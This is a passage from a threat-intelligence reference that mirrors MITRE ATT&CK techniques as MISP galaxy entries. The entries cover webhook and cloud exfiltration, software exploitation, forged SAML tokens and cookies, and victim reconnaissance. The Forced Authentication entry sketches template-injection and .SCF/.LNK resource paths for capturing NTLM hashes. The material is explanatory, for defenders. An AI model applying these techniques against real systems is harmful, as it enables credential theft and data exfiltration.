Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.[RedHat Webhooks] Many public and commercial services, such as Discord, Slack, and webhook.site, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.[Discord Intro to Webhooks] When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application.

Adversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated Automated Exfiltration of emails, chat messages, and other data.[Push Security SaaS Attacks Repository Webhooks] Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.[Microsoft SQL Server]

Access to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.[CyberArk Labs Discord][Talos Discord Webhook Abuse][Checkmarx Webhooks]

Internal MISP references

UUID 4c34fe8b-ea13-55f9-9a2f-5948e2a2ecca which can be used as unique global reference for Exfiltration Over Webhook in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1567.004
Related clusters

To see the related clusters, click here.

Exfiltration to Cloud Storage

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

Internal MISP references

UUID ce886c55-17ab-4c1c-90dc-3aa93e69bdb4 which can be used as unique global reference for Exfiltration to Cloud Storage in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1567.002
Related clusters

To see the related clusters, click here.

Exfiltration to Code Repository

Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.

Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network.

Internal MISP references

UUID c4a8902a-bb87-4be2-bbaf-c40c9ebcbae1 which can be used as unique global reference for Exfiltration to Code Repository in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1567.001
Related clusters

To see the related clusters, click here.

Exfiltration to Text Storage Sites

Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com, are commonly used by developers to share code and other information.

Text storage sites are often used to host malicious code for C2 communication (e.g., Stage Capabilities), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.[Pastebin EchoSec]

Note: This is distinct from Exfiltration to Code Repository, which highlight access to code repositories via APIs.

Internal MISP references

UUID 8b6743e7-e856-5772-8b38-2c002602b365 which can be used as unique global reference for Exfiltration to Text Storage Sites in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1567.003
Related clusters

To see the related clusters, click here.

Exfiltration Over Web Service

Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Internal MISP references

UUID 66768217-acdd-4b52-902f-e29483630ad6 which can be used as unique global reference for Exfiltration Over Web Service in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploitation for Client Execution

Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.

Several types exist:

Browser-based Exploitation

Web browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.

Office Applications

Common office and productivity applications such as Microsoft Office are also targeted through Phishing. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.

Common Third-party Applications

Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.

Internal MISP references

UUID 068df3d7-f788-44e4-9e6b-2ae443af1609 which can be used as unique global reference for Exploitation for Client Execution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploitation for Credential Access

Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 

Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain authenticated access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.[Technet MS14-068][ADSecurity Detecting Forged Tickets] Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don't properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.[Bugcrowd Replay Attack][Comparitech Replay Attack][Microsoft Midnight Blizzard Replay Attack]

Such exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.[Storm-0558 techniques for unauthorized email access]

Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.

Internal MISP references

UUID afdfa503-0464-4b42-a79c-a6fc828492ef which can be used as unique global reference for Exploitation for Credential Access in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploitation for Defense Evasion

Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.

Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for Security Software Discovery. The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.

There have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries [Salesforce zero-day in facebook phishing attack], evade security logs [Bypassing CloudTrail in AWS Service Catalog], or deploy hidden infrastructure.[GhostToken GCP flaw]

Internal MISP references

UUID 15b65bf2-dbe5-47bc-be09-ed97684bf391 which can be used as unique global reference for Exploitation for Defense Evasion in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploitation for Privilege Escalation

Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.

When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.

Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).[ESET InvisiMole June 2020][Unit42 AcidBox June 2020] Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via Ingress Tool Transfer or Lateral Tool Transfer.

Internal MISP references

UUID 9cc715d7-9969-485f-87a2-c9f7ed3cc44c which can be used as unique global reference for Exploitation for Privilege Escalation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploitation of Remote Services

Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.

An adversary may need to determine if the remote system is in a vulnerable state, which may be done through Network Service Discovery or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.

There are several well-known vulnerabilities that exist in common services such as SMB [CIS Multiple SMB Vulnerabilities] and RDP [NVD CVE-2017-0176] as well as applications that may be used within internal networks such as MySQL [NVD CVE-2016-6662] and web server services.[NVD CVE-2014-7169]

Depending on the permissions level of the vulnerable remote service an adversary may achieve Exploitation for Privilege Escalation as a result of lateral movement exploitation as well.

Internal MISP references

UUID 51ff4ada-8a71-4801-9cb8-a6e216eaa4e4 which can be used as unique global reference for Exploitation of Remote Services in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploit Public-Facing Application

Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.

Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.[NVD CVE-2016-6662][CIS Multiple SMB Vulnerabilities][US-CERT TA18-106A Network Infrastructure Devices 2018][Cisco Blog Legacy Device Attacks][NVD CVE-2014-7169] Depending on the flaw being exploited this may also involve Exploitation for Defense Evasion.

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via Escape to Host, or take advantage of weak identity and access management policies.

Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.[Mandiant Fortinet Zero Day][Wired Russia Cyberwar]

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.[OWASP Top 10][CWE top 25]

Internal MISP references

UUID 4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a which can be used as unique global reference for Exploit Public-Facing Application in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'IaaS', 'Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

External Remote Services

Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management and VNC can also be used externally.[MacOS VNC software for Remote Desktop]

Access to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.[Volexity Virtual Private Keylogging] Access to remote services may be used as a redundant or persistent access mechanism during an operation.

Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.[Trend Micro Exposed Docker Server][Unit 42 Hildegard Malware]

Internal MISP references

UUID c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4 which can be used as unique global reference for External Remote Services in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Fallback Channels

Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.

Internal MISP references

UUID be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1 which can be used as unique global reference for Fallback Channels in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

File and Directory Discovery

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.[Windows Commands JPCERT] Custom tools may also be used to gather file and directory information and interact with the Native API. Adversaries may also leverage a Network Device CLI on network devices to gather file and directory information (e.g. dir, show flash, and/or nvram).[US-CERT-TA18-106A]

Internal MISP references

UUID 1492c4ba-c933-47b8-953d-6de3db8cfce8 which can be used as unique global reference for File and Directory Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Linux and Mac File and Directory Permissions Modification

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.[Hybrid Analysis Icacls1 June 2018][Hybrid Analysis Icacls2 May 2018] File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).

Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Unix Shell Configuration Modification or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.[20 macOS Common Tools and Techniques]

Internal MISP references

UUID 5c6687f6-3539-4268-a6a4-2b98fdeac0fb which can be used as unique global reference for Linux and Mac File and Directory Permissions Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1222.002
Related clusters

To see the related clusters, click here.

Windows File and Directory Permissions Modification

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.[Hybrid Analysis Icacls1 June 2018][Hybrid Analysis Icacls2 May 2018] File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).[Microsoft DACL May 2018] Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.[Microsoft Access Control Lists May 2018]

Adversaries can interact with the DACLs using built-in Windows commands, such as icacls, cacls, takeown, and attrib, which can grant adversaries higher permissions on specific files and folders. Further, PowerShell provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.

Internal MISP references

UUID 9d36254c-e568-4c03-8688-e6eed5f7510c which can be used as unique global reference for Windows File and Directory Permissions Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1222.001
Related clusters

To see the related clusters, click here.

File and Directory Permissions Modification

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.[Hybrid Analysis Icacls1 June 2018][Hybrid Analysis Icacls2 May 2018] File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, Unix Shell Configuration Modification, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.

Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.[new_rust_based_ransomware][bad_luck_blackcat][falconoverwatch_blackcat_attack][blackmatter_blackcat][fsutil_behavior]

Internal MISP references

UUID cb2e4822-2529-4216-b5b8-75158c5f85ff which can be used as unique global reference for File and Directory Permissions Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Financial Theft

Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,[FBI-ransomware] business email compromise (BEC) and fraud,[FBI-BEC] "pig butchering,"[wired-pig butchering] bank hacking,[DOJ-DPRK Heist] and exploiting cryptocurrency networks.[BBC-Ronin]

Adversaries may Compromise Accounts to conduct unauthorized transfers of funds.[Internet crime report 2022] In the case of business email compromise or email fraud, an adversary may utilize Impersonation of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.[FBI-BEC] This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.[VEC]

Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after Data Encrypted for Impact [NYT-Colonial] and Exfiltration of data, followed by threatening public exposure unless payment is made to the adversary.[Mandiant-leaks]

Due to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as Data Destruction and business disruption.[AP-NotPetya]

Internal MISP references

UUID b9c9fd13-c10c-5e78-aeeb-ac18dc0605f9 which can be used as unique global reference for Financial Theft in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Firmware Corruption

Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.[Symantec Chernobyl W95.CIH] Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.

In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.[dhs_threat_to_net_devices][cisa_malware_orgs_ukraine] Depending on the device, this attack may also result in Data Destruction.

Internal MISP references

UUID 559c647a-7759-4943-856d-dc717b5a443e which can be used as unique global reference for Firmware Corruption in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Forced Authentication

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. [Wikipedia Server Message Block] This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.

Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. [Didier Stevens WebDAV Traffic] [Microsoft Managing WebDAV Security]

Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. Template Injection), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. [GitHub Hashjacking] With access to the credential hash, an adversary can perform off-line Brute Force cracking to gain access to plaintext credentials. [Cylance Redirect to SMB]

There are several different ways this can occur. [Osanda Stealing NetNTLM Hashes] Some specifics from in-the-wild use include:

  • A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. Template Injection). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. [US-CERT APT Energy Oct 2017]
  • A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. [US-CERT APT Energy Oct 2017]
Internal MISP references

UUID e732e1d4-fffa-4fc3-b387-47782c821688 which can be used as unique global reference for Forced Authentication in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

SAML Tokens

An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.[Microsoft SolarWinds Steps] The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy.[Microsoft SAML Token Lifetimes] Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.[Cyberark Golden SAML]

An adversary may utilize Private Keys to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.[Microsoft SolarWinds Customer Guidance] This differs from Steal Application Access Token and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to Use Alternate Authentication Material, which may bypass multi-factor and other authentication protection mechanisms.[Microsoft SolarWinds Customer Guidance]

Internal MISP references

UUID dc0aecef-3cb2-4381-b6e4-dfa7be16d42b which can be used as unique global reference for SAML Tokens in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1606.002
Related clusters

To see the related clusters, click here.

Web Cookies

Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.

Adversaries may generate these cookies in order to gain access to web resources. This differs from Steal Web Session Cookie and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.[Pass The Cookie] The generation of web cookies often requires secret values, such as passwords, Private Keys, or other cryptographic seed values.

Once forged, adversaries may use these web cookies to access resources (Web Session Cookie), which may bypass multi-factor and other authentication protection mechanisms.[Volexity SolarWinds][Pass The Cookie][Unit 42 Mac Crypto Cookies January 2019]

Internal MISP references

UUID b0966c0f-1e09-4d5d-acff-0ca79dc9da89 which can be used as unique global reference for Web Cookies in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1606.001
Related clusters

To see the related clusters, click here.

Forge Web Credentials

Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.

Adversaries may generate these credential materials in order to gain access to web resources. This differs from Steal Web Session Cookie, Steal Application Access Token, and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

The generation of web credentials often requires secret values, such as passwords, Private Keys, or other cryptographic seed values.[GitHub AWS-ADFS-Credential-Generator] Adversaries may also forge tokens by taking advantage of features such as the AssumeRole and GetFederationToken APIs in AWS, which allow users to request temporary security credentials (i.e., Temporary Elevated Cloud Access), or the zmprov gdpak command in Zimbra, which generates a pre-authentication key that can be used to generate tokens for any user in the domain.[AWS Temporary Security Credentials][Zimbra Preauth]

Once forged, adversaries may use these web credentials to access resources (ex: Use Alternate Authentication Material), which may bypass multi-factor and other authentication protection mechanisms.[Pass The Cookie][Unit 42 Mac Crypto Cookies January 2019][Microsoft SolarWinds Customer Guidance]

Internal MISP references

UUID d8507187-cea6-4be2-95b4-e875924e58c0 which can be used as unique global reference for Forge Web Credentials in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Client Configurations

Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning (ex: listening ports, server banners, user agent strings) or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.[ATT ScanBox] Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Supply Chain Compromise or External Remote Services).

Internal MISP references

UUID bc4f11b1-fd06-4e49-be48-e73ece82f1a9 which can be used as unique global reference for Client Configurations in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1592.004
Related clusters

To see the related clusters, click here.

Firmware

Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).[ArsTechnica Intel] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Supply Chain Compromise or Exploit Public-Facing Application).

Internal MISP references

UUID 8af6a9ee-c323-44fa-85d3-29366fd1bb4f which can be used as unique global reference for Firmware in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1592.003
Related clusters

To see the related clusters, click here.

Hardware

Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning (ex: hostnames, server banners, user agent strings) or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.[ATT ScanBox] Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Compromise Hardware Supply Chain or Hardware Additions).

Internal MISP references

UUID a5ab5108-1582-4357-b948-1c6148c7b5ce which can be used as unique global reference for Hardware in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1592.001
Related clusters

To see the related clusters, click here.

Software

Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning (ex: listening ports, server banners, user agent strings) or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.[ATT ScanBox] Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or for initial access (ex: Supply Chain Compromise or External Remote Services).

Internal MISP references

UUID 77476b73-f4d1-4689-8f9e-af08d27f4cba which can be used as unique global reference for Software in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1592.002
Related clusters

To see the related clusters, click here.

Gather Victim Host Information

Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.[ATT ScanBox] Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Supply Chain Compromise or External Remote Services).

Internal MISP references

